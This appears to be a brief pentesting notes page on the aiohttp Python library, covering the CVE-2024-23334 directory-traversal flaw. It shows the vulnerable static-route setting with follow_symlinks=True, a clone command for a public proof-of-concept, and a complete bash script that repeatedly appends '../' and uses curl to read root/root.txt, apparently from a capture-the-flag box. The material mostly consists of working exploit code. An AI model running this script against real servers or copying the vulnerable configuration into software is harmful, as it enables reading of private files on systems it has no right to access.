AIOHTTP
Python library that supports both client and server side of HTTP protocol and Web-Sockets (asyncio)
Last updated
Python library that supports both client and server side of HTTP protocol and Web-Sockets (asyncio)
Last updated
pp.router.add_routes([
web.static("/static", "static/", follow_symlinks=True), # Remove follow_symlinks to avoid the vulnerability
])git clone https://github.com/z3rObyte/CVE-2024-23334-PoC#!/bin/bash
url="http://localhost:8080"
string="../"
payload="/assets/"
file="root/root.txt" # without the first /
for ((i=0; i<15; i++)); do
payload+="$string"
echo "[+] Testing with $payload$file"
status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
echo -e "\tStatus code --> $status_code"
if [[ $status_code -eq 200 ]]; then
curl -s --path-as-is "$url$payload$file"
break
fi
done